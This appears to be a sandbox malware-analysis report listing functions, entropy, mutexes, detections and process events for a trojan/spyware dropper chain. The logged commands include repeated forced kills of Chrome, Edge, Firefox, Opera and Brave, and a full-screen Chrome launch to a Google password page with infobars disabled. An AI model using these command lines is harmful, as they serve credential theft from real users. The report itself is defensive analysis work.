                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DE88605_2_00DE8860
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DA4DE05_2_00DA4DE0
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DE31A85_2_00DE31A8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DE2D105_2_00DE2D10
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DE779B5_2_00DE779B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DA4B305_2_00DA4B30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DD7F365_2_00DD7F36
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B280606_2_00B28060
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B920466_2_00B92046
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B882986_2_00B88298
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B5E4FF6_2_00B5E4FF
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B5676B6_2_00B5676B
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BB48736_2_00BB4873
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B4CAA06_2_00B4CAA0
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B2CAF06_2_00B2CAF0
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B3CC396_2_00B3CC39
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B56DD96_2_00B56DD9
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B291C06_2_00B291C0
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B3B1196_2_00B3B119
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B413946_2_00B41394
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B417066_2_00B41706
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B4781B6_2_00B4781B
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B419B06_2_00B419B0
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B279206_2_00B27920
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B3997D6_2_00B3997D
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B47A4A6_2_00B47A4A
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B47CA76_2_00B47CA7
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B41C776_2_00B41C77
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B59EEE6_2_00B59EEE
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BABE446_2_00BABE44
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B41F326_2_00B41F32
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: String function: 00B40A30 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: String function: 00B3F9F2 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: String function: 00B845C0 appears 316 times
                                Source: 8ObkdHP9Hq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: 8ObkdHP9Hq.exeStatic PE information: Section: ZLIB complexity 0.9982065309945504
                                Source: 8ObkdHP9Hq.exeStatic PE information: Section: hicznzml ZLIB complexity 0.9947466036733454
                                Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982065309945504
                                Source: skotes.exe.0.drStatic PE information: Section: hicznzml ZLIB complexity 0.9947466036733454
                                Source: random[1].exe0.5.drStatic PE information: Section: ZLIB complexity 0.9994907693894389
                                Source: random[1].exe0.5.drStatic PE information: Section: kawjnymv ZLIB complexity 0.9945041232638889
                                Source: 9d7da53f74.exe.5.drStatic PE information: Section: ZLIB complexity 0.9994907693894389
                                Source: 9d7da53f74.exe.5.drStatic PE information: Section: kawjnymv ZLIB complexity 0.9945041232638889
                                Source: num.exe, 00000014.00000002.2442234733.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 00000014.00000000.2430858736.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 0000002C.00000000.2616256029.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 0000002C.00000002.2631047820.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num[1].exe.5.dr, num.exe.5.drBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@201/37@38/12
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B937B5 GetLastError,FormatMessageW,6_2_00B937B5
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B810BF AdjustTokenPrivileges,CloseHandle,6_2_00B810BF
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00B816C3
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_00B951CD
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BAA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00BAA67C
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,6_2_00B9648E
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_00B242A2
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: 8ObkdHP9Hq.exeReversingLabs: Detection: 52%
                                Source: 8ObkdHP9Hq.exeVirustotal: Detection: 56%
                                Source: 8ObkdHP9Hq.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: 9d7da53f74.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: 9d7da53f74.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile read: C:\Users\user\Desktop\8ObkdHP9Hq.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\8ObkdHP9Hq.exe "C:\Users\user\Desktop\8ObkdHP9Hq.exe"
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe"
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5648 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1152 --field-trial-handle=2040,i,8769351574913738686,7511269282204500585,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4484 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,7048868189645442855,15603037541109083957,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2904 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
